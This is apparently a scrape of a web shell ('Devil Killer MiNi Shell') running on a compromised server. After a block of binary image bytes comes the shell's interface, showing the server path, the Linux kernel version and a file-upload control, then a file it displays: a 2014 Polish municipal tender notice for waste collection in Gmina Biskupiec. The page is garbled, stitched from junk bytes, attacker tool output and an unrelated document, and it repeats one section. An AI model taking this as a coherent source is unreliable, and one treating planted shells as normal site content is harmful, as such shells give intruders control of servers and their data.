JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140714/152757-N-2014.html

<p class="kh_header"><b>Biskupiec: ODBIÓR I ZAGOSPODAROWANIE  ODPADÓW KOMUNALNYCH Z TERENU
GMINY BISKUPIEC</b><br>
<b>Numer ogłoszenia: 152757 - 2014; data zamieszczenia: 14.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biskupiec , ul. Rynek 1, 13-340 Biskupiec, woj. warmińsko-mazurskie, tel. 56 4745057 do 59, faks 56 4747952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminabiskupiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE  ODPADÓW KOMUNALNYCH Z TERENU
GMINY BISKUPIEC.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Gmina Biskupiec z s w Biskupcu , zwany dalej  Zamawiającym  , zaprasza do udziału  w postępowaniu o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego
Wykonawca zobowiązany jest zrealizować  usługę   zgodne z obowiązującymi przepisami prawnymi w szczególności z:
-  Ustawą z dnia 14 grudnia 2012 r. o odpadach (tj. Dz. U. z 2013 r. poz. 21),
-  Ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2013 r. poz. 1399 ),
-  Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tj. Dz. U. z 2008r. Nr 25 poz. 150 z późn. zm.) 
-  Uchwałą Nr XVIII 334 12 Sejmiku Województwa Warmińsko-mazurskiego z dnia 19 czerwca 2012 r. w sprawie wykonania Wojewódzkiego Planu Gospodarki  Odpadami dla  Województwa Warmińsko-mazurskiego na lata 2011-2016 z uwzględnieniem późniejszych zmian, 
-  Uchwałą nr XXV 205 13 Rady Gminy Biskupiec z dnia 25 kwietnia 2013 r. w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie Gminy Biskupiec ( dalej zwanym regulaminem),
- Uchwałą nr XXV 208 13  Rady Gminy Biskupiec , z dnia 25 kwietnia 2013 r. w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
- Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122),
- Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r., w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630) 
- Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645),
- Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r., poz. 676).
Przedmiot zamówienia obejmuje:
Odbiór i zagospodarowanie odpadów komunalnych tj:
komunalne odpady niesegregowane ( zmieszanych);
komunalne odpady selektywnie zbierane, tj. szkło i opakowanie szklane, papier i makulatura, tworzywa sztuczne, opakowania wielomateriałowe, posegregacyjne, metal oraz odzież i tekstylia  i odpady biodegradowalne w tym odpady zielone;
przeterminowane leki i chemikalia, zużyte baterie i akumulatory, meble i inne odpady wielkogabarytowe;
odpady komunalne remontowo-budowlane
Inne wymienione w tabeli nr 1
Zakup oraz sukcesywne dostarczenie mieszkańcom, którzy zbierają odpady w sposób selektywny, worków w niezbędnej ilości na odpady  suche 
Miejsce realizacji usługi:
Odbioru odpadów komunalnych określonych w w punktach należy dokonać z nieruchomości , na których zamieszkują mieszkańcy i na których nie zamieszkują mieszkańcy a wytwarzane są odpady  w granicach administracyjnych gminy Biskupiec.
Przez nieruchomości, na których zamieszkują mieszkańcy rozumie się nieruchomości wykorzystywane w całości do celów mieszkalnych oraz nieruchomości mieszkalno-użytkowe  lub użytkowo-mieszkalne w części mieszkalnej.
Nieruchomość niezamieszkała - rozumie się przez to nieruchomość nieprzeznaczoną do trwałego zamieszkania. takie jak: szkoła, urzędy, biura, pole namiotowe, domy i działki letniskowe, cmentarze  itp. Do nieruchomości niezamieszkałych zalicza się również nieruchomości na terenie, których prowadzona jest działalność gospodarcza (np. zakład krawiecki, zakład fryzjerski, restauracja, sklep, warsztat, stolarnia  itp.)

Dane ogólne niezbędne dla Wykonawcy:
liczba mieszkańców zameldowana na pobyt stały  - 9829 osoby- stan na 31.12.2013 r.
Powierzchnia gminy - 241 km2,
Szacunkowa liczba mieszkańców przypadająca na 1 km2  - 40 osób.
Szacunkowa liczba nieruchomości nie zamieszkałych na których powstają odpady: około 200
Około 30 procent  osób zbiera w sposób selektywny (selekcja na suche i mokre)
Masa odpadów komunalnych o kodzie 20 03 01 zebranych w roku 2013 roku - 584,68 Mg

Szczegółowy  opis przedmiotu zamówienia zawarty  jest w załączniku  nr 9 do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 20 procent wartości zamówienia podstawowego polegających na powtórzeniu zamówienia w kolejnych miesiącach.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.12.00-4, 90.51.13.00-5, 90.51.20.00-9, 90.53.30.00-2, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania, zamawiający wymaga wniesienia wadium. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy 00/100 złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2007r. Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelew na konto Zamawiającego:
Bank Spółdzielczy w Brodnicy Oddział Operacyjny w Biskupcu
nr 58 9484 1121 2002 0100 0286 0002
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin  wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz- oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w kancelarii pok. Nr 11 lub dołączyć do oferty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
8.	W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędnym jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub firmę ubezpieczeniową (oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe.
9.	W przypadku poręczenia niezbędne jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela.
10.	Złożenie poręczenie gwarancja musi zawierać:
11.	Termin obowiązywania gwarancji poręczenia do końca okresu związania ofertą,
12.	Informację, że udzielona gwarancja/poręczenie stanowi zabezpieczenie na wadium na rzecz Zamawiającego,
13.	Zobowiązanie zgodnie z art. 46 ust. 4A i ust. 5 ustawy prawo zamówień publicznych:
14.	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
15.	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
16.	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
17.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
18.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że uwodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.spełniają warunki określone w art.22 ust.1 ustawy  z dnia 29 stycznia 2004 roku - prawo zamówień publicznych  a dotyczące  :
-posiadania uprawnień do wykonywania określonej działalności lub czynności , jeżeli przepisy prawa nakładają obowiązek  ich posiadania; zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże że jest wpisany do Rejestru Działalności Regulowanej prowadzonego przez Wójta Gminy Biskupiec</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że wykonał  lub wykonuje usługę/usługi polegające na odbieraniu odpadów komunalnych selektywnie zbieranych i/lub odpadów komunalnych zmieszanych na kwotę nie niższą niż 500.000 zł netto rocznie z terenu jednej gminy o powierzchni nie mniejszej niż 200 km2 oraz liczbie mieszkańców nie mniejszej niż 9500 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , z podaniem wartości , przedmiotu, dat wykonania i odbiorców, na rzecz których usługi zostały wykonane lub są wykonywane , oraz  załączeniem dokumentów dotyczących najważniejszych usług. Dokumenty powinny określać czy usługi te zostały wykonane  lub są wykonywane w sposób należyty.
Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował  co najmniej :
Wymagane ilości i rodzaje pojazdów:
Minimalna wymagana ilość i rodzaj pojazdów :
Dla odpadów zmieszanych i odpadów po sortowniczych
Co najmniej dwoma pojazdami przystosowanymi do odbioru odpadów zmieszanych z mechanizmem załadowczym  -  śmieciarka; bezpylne ;  o dopuszczalnej masie całkowitej powyżej 3,5t; spełniającymi wymagania  Euro II lub wyższe
Dla odpadów selektywnie zebranych (papier i makulatura; metale, tworzywa sztuczne, opakowania wielomateriałowe, odzież i tekstylia, szkło, odpady ulegające biodegradacji)
Co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych z mechanizmem załadowczym - śmieciarka, bezpylne; o dopuszczalnej masie całkowitej powyżej 3,5 t;
Dla wielkogabarytowych; zielonych; budowlanych i rozbiórkowych
1)	dwoma samochodami dostawczymi o dopuszczalnej masie całkowitej do 3,5 t każdy;
2)	jednym ciągnikiem z przyczepą o ładowności minimalnej 3,5 t;
3)	jedną ładowarką o pojemności łyżki roboczej minimalnej 1,0 m3
Wymagania dla zastosowanych przy realizacji przedmiotu zamówienia pojazdów:
a) pojazdy muszą być  trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
b)pojazdy muszą posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z obowiązującymi przepisami o ruchu drogowym;
c)  pojazdy i urządzenia  muszą być utrzymywane  w należytym stanie technicznym i sanitarnym;
d) pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji tak często, aby zapewnić właściwy stan sanitarny , jednakże nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie. Wykonawca zobowiązany jest do prowadzenia i przechowywania przez okres 5 lat od  dnia rozpoczęcia realizacji przedmiotu zamówienia dokumentacji w zakresie informacji o stosowanych środkach dezynfekujących oraz o częstotliwości wykonywanej dezynfekcji pojazdów i urządzeń;
e)pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas  transportu oraz muszą być zabezpieczone przed rozwiewaniem , rozpylaniem przewożonych odpadów a także przed wpływem oddziaływania czynników atmosferycznych na odpady;
f) pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników;
g) pojazdy wskazane do realizacji przedmiotu zamówienia muszą być przez cały okres realizacji przedmiotu zamówienia  wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie , przechowywanie i odczytywanie danych o położeniu pojazdów i miejscach ich postoju oraz wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów; system monitorowania pracy sprzętu obejmować musi między innymi: bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie w celu odczytu ww. danych; pamięć danych powinna być przechowywana i odczytywalna minimum przez okres 30 dni, przy czym odczytanie danych nie może powodować kasowania zawartości pamięci urządzenia monitorującego.
Wykonawca musi posiadać bazę transportową usytuowaną na terenie gminy Biskupiec  lub w odległości nie większej niż 60 km od granicy tej gminy. Wykonawca musi  posiadać tytuł prawny do terenu na którym znajduje się baza transportowa. Baza transportowa musi spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości -Dz. U. z 2013 r, poz.122.
Jeżeli Wykonawca polega na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował  co najmniej :
Wymagane ilości i rodzaje pojazdów:
Minimalna wymagana ilość i rodzaj pojazdów :
Dla odpadów zmieszanych i odpadów po sortowniczych
Co najmniej dwoma pojazdami przystosowanymi do odbioru odpadów zmieszanych z mechanizmem załadowczym  -  śmieciarka; bezpylne ;  o dopuszczalnej masie całkowitej powyżej 3,5t; spełniającymi wymagania  Euro II lub wyższe
Dla odpadów selektywnie zebranych (papier i makulatura; metale, tworzywa sztuczne, opakowania wielomateriałowe, odzież i tekstylia, szkło, odpady ulegające biodegradacji)
Co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych z mechanizmem załadowczym - śmieciarka, bezpylne; o dopuszczalnej masie całkowitej powyżej 3,5 t;
Dla wielkogabarytowych; zielonych; budowlanych i rozbiórkowych
1)	dwoma samochodami dostawczymi o dopuszczalnej masie całkowitej do 3,5 t każdy;
2)	jednym ciągnikiem z przyczepą o ładowności minimalnej 3,5 t;
3)	jedną ładowarką o pojemności łyżki roboczej minimalnej 1,0 m3
Wymagania dla zastosowanych przy realizacji przedmiotu zamówienia pojazdów:
a) pojazdy muszą być  trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
b)pojazdy muszą posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z obowiązującymi przepisami o ruchu drogowym;
c)  pojazdy i urządzenia  muszą być utrzymywane  w należytym stanie technicznym i sanitarnym;
d) pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji tak często, aby zapewnić właściwy stan sanitarny , jednakże nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie. Wykonawca zobowiązany jest do prowadzenia i przechowywania przez okres 5 lat od  dnia rozpoczęcia realizacji przedmiotu zamówienia dokumentacji w zakresie informacji o stosowanych środkach dezynfekujących oraz o częstotliwości wykonywanej dezynfekcji pojazdów i urządzeń;
e)pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas  transportu oraz muszą być zabezpieczone przed rozwiewaniem , rozpylaniem przewożonych odpadów a także przed wpływem oddziaływania czynników atmosferycznych na odpady;
f) pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników;
g) pojazdy wskazane do realizacji przedmiotu zamówienia muszą być przez cały okres realizacji przedmiotu zamówienia  wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie , przechowywanie i odczytywanie danych o położeniu pojazdów i miejscach ich postoju oraz wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów; system monitorowania pracy sprzętu obejmować musi między innymi: bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie w celu odczytu ww. danych; pamięć danych powinna być przechowywana i odczytywalna minimum przez okres 30 dni, przy czym odczytanie danych nie może powodować kasowania zawartości pamięci urządzenia monitorującego.
Wykonawca musi posiadać bazę transportową usytuowaną na terenie gminy Biskupiec  lub w odległości nie większej niż 60 km od granicy tej gminy. Wykonawca musi  posiadać tytuł prawny do terenu na którym znajduje się baza transportowa. Baza transportowa musi spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości -Dz. U. z 2013 r, poz.122.
Jeżeli Wykonawca polega na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia;
Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i ust.2 ustawy - prawo zamówień publicznych.

Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą  spełnia  nie spełnia  na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów

Wykonawcy , którzy:
a)	nie złożą oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożą dokumenty zawierające błędy, z zastrzeżeniem art.26 ust.3 ustawy - Prawo zamówień publicznych albo
b)	z przedłożonych oświadczeń i dokumentów  będzie wynikało , że nie spełniają wymaganych warunków ,
zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

